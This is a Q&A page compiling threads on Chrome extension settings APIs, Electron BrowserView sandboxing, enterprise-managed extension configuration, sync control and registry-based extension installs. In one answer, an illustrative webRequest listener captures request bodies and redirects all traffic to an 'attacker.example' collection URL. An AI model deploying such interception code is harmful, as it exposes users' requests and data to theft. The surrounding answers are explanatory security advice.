How to change Chromium configs through extension - google-chrome-extension

I need some advice about what Chromium extensions can do. Can an extension change browser settings such as the home page, the default behavior for protocol handlers (tel, mailto), security settings ("protect from dangerous websites", for example), disabling the sending of statistics to Google, etc.?
Which configs from chrome://settings/ can be changed, and how can this be done if it's possible?

The Chrome API index is a good place to start.
From it, you can glean the following capabilities:
The accessibilityFeatures API deals with accessibility settings.
The browsingData API deals with clearing browsing data.
The contentSettings API deals with allowed content, site permissions and plugins.
The downloads API can at least partially influence download settings.
The fontSettings API can manage fonts used by Chrome.
The management API can manage (but not install) other extensions.
The privacy API deals with privacy-related settings, including some security settings (see the sketch after this list).
The proxy API can manage proxy settings.
In addition, there are a number of Chrome OS-specific APIs I won't list here.
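For instance, here is a minimal sketch using the privacy API (it assumes the extension's manifest declares the "privacy" permission); the Safe Browsing flag corresponds roughly to the "protect from dangerous websites" setting from the question:

// Turn Safe Browsing ("protect from dangerous websites") on:
chrome.privacy.services.safeBrowsingEnabled.set({ value: true }, () => {
  if (chrome.runtime.lastError) {
    console.warn(chrome.runtime.lastError.message);
  }
});

// Read the current value and find out who controls it
// (the user, this extension, another extension, or enterprise policy):
chrome.privacy.services.safeBrowsingEnabled.get({}, (details) => {
  console.log(details.value, details.levelOfControl);
});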
There are also some manifest keys that can influence Chrome settings on install - such as the home page. See chrome_settings_overrides (note: not available on Linux) and to a lesser extent Override Pages.
See also Protecting user settings on Windows with the new Settings API (which announced the above).
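For example, a manifest fragment along these lines sets the home page at install time (the URL is a placeholder):

"chrome_settings_overrides": {
  "homepage": "https://intranet.example.com/start"
}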
Other than those, no, you can't override Chrome settings. You cannot dynamically change the home page or search provider, you can't control protocol handlers (that's handled at the OS level anyway), etc.
Note that you can't inject scripts into chrome://* pages, so you won't be able to just fiddle with the UI.

Related

Security Implications in Electron as a Web Browser

I asked this question a little over a week ago on the Atom forums (link below), and didn't receive a response, so I am reposting it here in the hopes that someone may be able to provide insight on my problem.
Recently, I have taken up an open source project which uses Electron as its front-end. This project has two requirements: it must be cross-platform, and it must have an embedded web browser (which should be able to browse the web and render content like a typical browser). Considering the rather large footprint Electron has already added to my application, it seems like a bad idea to attempt to use another embedded web framework alongside it. So, in the interest of simplifying my project and retaining the UI built on top of Electron, I am looking into using Electron itself as the web browser. Here’s where I’ve run into a problem.
In a security page for Electron’s documentation, it is explicitly stated that,
it is important to understand … Electron is not a web browser
This quote comes within the context that Electron (or rather the code running on top of it) carries the unique ability to interact with the user’s operating system, unlike typical web applications. The page goes on to say,
displaying arbitrary content from untrusted sources poses a severe security risk that Electron is not intended to handle
At this point, I was tempted to give up on the idea of using Electron as an inbuilt browser, but further down on that same page, you can find another very interesting tidbit:
To display remote content, use the <webview> tag or BrowserView, [and] make sure to disable the nodeIntegration and enable contextIsolation
Link: https://electronjs.org/docs/tutorial/security#isolation-for-untrusted-content
First, in regard to using webviews, Electron’s own documentation recommends outright avoiding them:
Electron’s webview tag is based on Chromium’s webview, which is undergoing dramatic architectural changes. This impacts the stability of webviews, including rendering, navigation, and event routing. We currently recommend to not use the webview tag and to consider alternatives, like iframe, Electron’s BrowserView, or an architecture that avoids embedded content altogether.
Link: https://electronjs.org/docs/api/webview-tag
Seeing as I cannot avoid embedded content, I opted to look into using a BrowserView, but what I found was not very encouraging either. The advice, as it stands, is to do two things:
disable nodeIntegration
enable contextIsolation
After looking at the security and best-practices page, I will also append the following steps:
deny session permission requests from remote content (webcam, microphone, location, etc.)
catch webview elements in creation and strip default privileges
disable the creation of new windows
disable the remote module
That is a fair amount of steps to undergo in securing external content. Not to mention, there were several additional warnings scattered throughout the best-practices page, such as the following:
(On verifying webview options before creation)
Again, this list merely minimizes the risk, it does not remove it. If your goal is to display a website, a browser will be a more secure option.
Link: https://electronjs.org/docs/tutorial/security#11-verify-webview-options-before-creation
(On disabling the remote module)
However, if your app can run untrusted content and even if you sandbox your renderer processes accordingly, the remote module makes it easy for malicious code to escape the sandbox and have access to system resources via the higher privileges of the main process.
Link: https://electronjs.org/docs/tutorial/security#15-disable-the-remote-module
Not to mention, upon navigation to the BrowserView page, the whole class is listed as experimental.
This all isn’t even to mention the added attack surface created by Electron, such as a vulnerability in the webview component just last year: CVE-2018-1000136
Now, taking into account all of the above, numerous developers have still opted to create web browsers that routinely consume external and uncontrolled content using Electron.
Browsers using Electron (linked directly from Electron’s website):
https://electronjs.org/apps/wexond
https://electronjs.org/apps/dot
https://electronjs.org/apps/beaker-browser
To me, it seems irresponsible to submit users to the above security implications as a trade-off for convenience.
That being said, my question is: can you safely, to the point at which you could ensure the integrity of your users, implement web browsing capabilities for uncontrolled content using Electron?
Thank you for your time.
Link to the original post:
https://discuss.atom.io/t/security-implications-in-electron-as-a-web-browser/70653
Some ideas that don't fit into a comment box:
[the project] must have an embedded web browser
So I presume then that this project isn't just a web browser. There's other content there that may have access to Node, but you just want the embedded-web-browser portion of it to be sandboxed appropriately, right?
Regarding the comments about <webview>: yes, it is considered unstable, and Electron recommends using a BrowserView instead. I don't think the fact that it's marked as "experimental" should necessarily deter you from using it (especially considering that the Electron team is recommending it, though perhaps as the lesser of two evils).
"Experimental" doesn't imply it's unstable. It can just mean that the Electron team is experimenting with this approach and that the approach may change in the future (at which point I would expect Electron to provide a transition path forward). That's only one possible interpretation, though, and ultimately the Electron team would have to comment on it.
The advice... is to do two things:
disable nodeIntegration
enable contextIsolation
I would also make use of the sandbox option inherited from BrowserWindow. BrowserView's docs on the constructor options say:
webPreferences Object (optional) - See BrowserWindow.
which tells me that BrowserView accepts the same options as BrowserWindow.
You would set it up like so:
const path = require('path');
const { BrowserView } = require('electron');

const view = new BrowserView({
  webPreferences: {
    sandbox: true,           // run the renderer inside the Chromium sandbox
    nodeIntegration: false,  // no Node.js APIs in the loaded page
    contextIsolation: true,  // keep the preload script isolated from page scripts
    preload: path.join(__dirname, 'pathToPreloadScript.js') // preload paths should be absolute
  }
});
See more information about this approach here. The preload script is what would expose some Node IPC APIs to the sandboxed content you're loading. Note the Status section at the bottom, which says:
Please use the sandbox option with care, as it is still an experimental feature. We are still not aware of the security implications of exposing some Electron renderer APIs to the preload script
If the content you're loading in the BrowserView never needs to communicate back to the application, then you don't need a preload script at all and can just sandbox the BrowserView.
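If it does need a narrow channel back to the app, a minimal preload sketch could look like the following (this assumes a reasonably recent Electron with contextBridge; the exposed embeddedBrowser API name and the page-title-updated channel are made-up examples):

// pathToPreloadScript.js - the file referenced from the webPreferences above
const { contextBridge, ipcRenderer } = require('electron');

// Expose only a small, explicit API to the untrusted page; never expose ipcRenderer itself.
contextBridge.exposeInMainWorld('embeddedBrowser', {
  reportTitle: (title) => ipcRenderer.send('page-title-updated', String(title))
});

The page then calls window.embeddedBrowser.reportTitle(...), and the main process listens with ipcMain.on('page-title-updated', ...).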
After looking at the security and best-practices page, I will also append the following steps:
deny session permission requests from remote content (webcam, microphone, location, etc.)
catch webview elements in creation and strip default privileges
disable the creation of new windows
disable the remote module
Sure, those sound reasonable. Note that if your embedded browser needs to be able to open new windows (via window.open or <a target="_blank" />) then you'd have to allow popups.
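As a rough sketch of those steps in the main process (this assumes an Electron version from around the time of this question; newer releases replace the new-window event with webContents.setWindowOpenHandler):

const { app, session } = require('electron');

app.whenReady().then(() => {
  // Deny permission requests (webcam, microphone, geolocation, ...) from remote content.
  session.defaultSession.setPermissionRequestHandler((webContents, permission, callback) => {
    callback(false); // deny everything; allow-list specific permissions here if you must
  });
});

app.on('web-contents-created', (event, contents) => {
  // Strip risky defaults from any <webview> before it is attached.
  contents.on('will-attach-webview', (event, webPreferences, params) => {
    delete webPreferences.preload;          // drop any preload the embedder tries to set
    webPreferences.nodeIntegration = false; // never give embedded pages Node access
    webPreferences.contextIsolation = true;
  });
  // Disable creation of new windows from remote content.
  contents.on('new-window', (event) => {
    event.preventDefault();
  });
});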
That is a fair amount of steps to undergo in securing external content.
Sure, but is your main concern with the security of the app, or with how much work it takes to make it secure? Browser developers need to consider similar things to ensure webpages can't get access to the OS. It's just part of the game.
Again, this list merely minimizes the risk, it does not remove it. If your goal is to display a website, a browser will be a more secure option.
This is just saying that if all you're trying to do is display a website, then just use a browser since that's what they're there for.
If you need to do other things, well then you can't use a browser, so you'll have to make your own app, making sure it's reasonably secure.
I think that if you follow what's recommended in the Security document and keep up to date with new Electron releases, then you're doing the best you can do.
As for whether that's good enough, I can't say. It depends on what you're developing and what you're trying to protect against.
However, my thoughts can't substitute for the more expert opinions of those on the Electron team. This question could certainly use some guidance from them.

Centralized configuration of settings for a Google Chrome Extension?

We'd like to develop a Google Chrome extension that is managed centrally, e.g. by MS Active Directory Group Policies.
How do we centrally distribute domain/customer specific configuration for such an extension?
Our users are mostly Windows users in the same domain, but we can not assume that they're logged in to any particular G-Suite organisation.
It does seem possible to create Active Directory Group Policies to install a particular extension for all users. That same article does however say:
Unfortunately I was not able to come up with a solution concerning the centralized management of Chrome extension settings. Some extensions, for example The Great Suspender, come with additional options for the user to configure. As said, I was not able to find a way how to manage or configure these centrally.
So now that the extension is installed, how do we configure it?
Since it is our own extension, there is more freedom. I'm thinking that, with a Group Policy, one could install C:\some\extension-file.json and then run
google-chrome --headless file:///some/extension-file.json
If the extension intercepts that (as e.g. ViolentMonkey does), but only if it is a file:// URL, I guess that could be made to work. But I'm hoping: can you come up with something more elegant?
How do we centrally distribute domain/customer specific configuration for such an extension?
chrome.storage.managed is the specific answer for that need. Quoting the docs:
Enterprise policies configured by the administrator for the extension can be read (using storage.managed with a schema).
With that in mind, you have to do the following:
Provide a schema for the storage via the storage.managed_schema key in the manifest. An example is given in the documentation.
Present values expected by the schema via GPO / registry as described in admin docs.
You can verify that the policy-mandated values are loaded by observing chrome://policy.
You can then use chrome.storage.managed as you would any other chrome.storage (though it is read-only), including watching for changes with onChanged.
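As a rough sketch of the extension side (the schema file name and the serverUrl setting below are made up for illustration):

// manifest.json would declare: "storage": { "managed_schema": "managed_schema.json" }

// Read the admin-supplied values (an empty object if no policy is set):
chrome.storage.managed.get(null, (items) => {
  console.log('Policy-provided settings:', items);
  const serverUrl = items.serverUrl; // a hypothetical setting declared in the schema
});

// React to policy updates pushed while the browser is running:
chrome.storage.onChanged.addListener((changes, areaName) => {
  if (areaName === 'managed') {
    console.log('Managed settings changed:', changes);
  }
});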

Do Chrome extensions have access to Chrome apps?

For security considerations, I am wondering whether Chrome extensions have access to an app. I am designing a Chrome App which handles sensitive data. As far as I understand it, that app runs in a sandboxed environment which should be fairly isolated. If a user had by mistake installed a malicious Chrome extension, would that extension be able to intercept/modify any of the sensitive data in the app?
Please note that I do not consider other ways of interception outside of the Chrome environment, e.g. some virus that allows someone to get root access or the like. I would just like to understand to what degree a Chrome app is more susceptible to interception than a standard stand-alone application.
Sebastian
On one hand, extensions cannot touch your app's windows (as in, inspection / script injection) in the default environment, even with "debugger" permission. Your "local" data should be safe.
On the other, I tested it and concluded that the webRequest API will catch all XHRs you send.
This includes headers for both request and response, and request body. Response body is currently not available for inspection; however, a malicious extension can perform a redirect, modify your request or cancel it.
This was deemed a security issue; as of Chrome 45, extensions can no longer intercept traffic from other extensions and apps. Hosted apps were accidentally included too, but it's a bug that will be fixed soon - traffic from hosted apps will be open to webRequest as normal.
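For illustration, this is roughly what such interception looks like from the extension's side (the redirect URL is a placeholder, and the webRequest, webRequestBlocking and host permissions would be required); before the Chrome 45 change the same listener also matched traffic from other extensions and apps:

chrome.webRequest.onBeforeRequest.addListener(
  (details) => {
    console.log('Intercepted', details.method, details.url, details.requestBody);
    // A blocking listener may cancel the request or redirect it elsewhere:
    return { redirectUrl: 'https://attacker.example/collect' };
  },
  { urls: ['<all_urls>'] },
  ['blocking', 'requestBody']
);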
I don't know any other possibility for an extension to snoop on an app (without any anomalous chrome://flag configuration).
Extensions or other apps cannot access data inside other extensions or apps. An exception may be data in the syncFileSystem API, since an extension could be granted access to the user's Google Drive.

Forcing disable of Google Account synchronization of extension on a per-extension basis

We have authored a Chrome extension and would like to ensure that our extension does not at any time participate in being sync'd using Google Account synchronization, even if the user has specified in the Advanced sync settings dialog that extensions be sync'd. Is there a way to prevent this sync'ing on a per-extension basis? Is there some setting we could place in the extension manifest file to accomplish this? Or other way to accomplish this?
If that is not possible, can we force the Extensions checkbox to always be unchecked and unalterable by the user, using enterprise-level techniques such as Group Policy Update? This is not optimal, since we only want to stop the sync'ing of our extension, and not prevent sync'ing of all extensions.
We do see that the SyncDisabled policy registry setting is available to us, but that looks like it will disable ALL data synchronization including Apps, Extensions, Settings, History, etc. This is even less desirable to us, since we don't want to affect other synchronization -- we just want to prevent only our extension from being sync'd.
The use case for this involves the following:
A corporate user installs Chrome on his work computer. Our extension is useful in the enterprise environment and is installed on Chrome.
At some point, using the Chrome browser, this user logs into his personal Gmail account. He has set up his Google Account to turn synchronization on.
Now when this user, using his home computer and Chrome browser, logs in to Google, he will find that our extension has also been installed on his Chrome browser at home -- this is not desirable, since our extension has no usefulness in the home environment. Moreover, the user may consider the presence of our extension an unwanted intrusion into his home computing environment.
The only remedy for this user would seem to be that he could go to the Advanced sync settings and uncheck the Extensions checkbox, but then he would lose the benefit of extension sync'ing of other extensions, which he may want.
Well, if you're doing this in a corporate / managed environment and can use Group Policy, you don't need to publish your extension on the Web Store at all, which prevents the sync.
Any extension in ExtensionInstallForcelist will be installed even if it (and its update manifest) is hosted outside the Web Store. This prevents the extension itself from syncing (though it will probably still allow chrome.storage.sync to function for it, which is a plus).
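On Windows, that policy boils down to registry values like the following sketch (the extension ID and update URL are placeholders):

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="aaaabbbbccccddddeeeeffffgggghhhh;https://intranet.example.com/extension/updates.xml"

Each value is a string of the form <extension-id>;<update-manifest-url>.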
Other than that, I don't think there's a way to prevent an individual Store-hosted extension from syncing.

How do third party installer install addons in our browser?

My question is: how do third-party installers install add-ons such as toolbars in the browser, and how are they able to set the homepage and other browser properties?
I want to make an add-on that gets installed in the browser the same way.
Is that possible?
In principle, installing extensions along with other software is possible. I'm describing the procedure for Windows.
The following conditions have to be met:
You must be able to write to the HKLM registry subtree (needs Admin rights)
The extension must be published on Chrome Web Store
The machine must be able to download the extension from Web Store
If those conditions are met, you can do it according to the procedure described here. Basically, the installer must create a registry key that will trigger Chrome to download the extension on next launch.
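Concretely, on Windows this is a registry key of the following form (the extension ID is a placeholder; the update URL shown is the standard Web Store endpoint):

[HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions\aaaabbbbccccddddeeeeffffgggghhhh]
"update_url"="https://clients2.google.com/service/update2/crx"

On the next launch, Chrome picks up the key, downloads the extension from the Web Store, and asks the user to confirm enabling it.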
That said, Google has gone to great lengths to prevent silent installs and browser settings hijacking. Such setting overrides are an arms race, and Chrome keeps tightening its defenses. Ask yourself whether it's ethical to install your extension this way.
It will probably annoy your users and will flag your extension for more meticulous checks by Google. Remember that Google can disable any extension hosted by the Web Store if it violates its policies.
Also, be mindful of the single purpose policy. A toolbar that also overrides search/homepage/settings will be frowned upon. At a minimum, it should be split into several extensions; better yet, don't do it at all.
An extension can override, say, the homepage, but this is heavily restricted. The extension must be in the Web Store as above, and ownership of any override pages must be verified for the Web Store developer account. All in the name of the security and comfort of users.
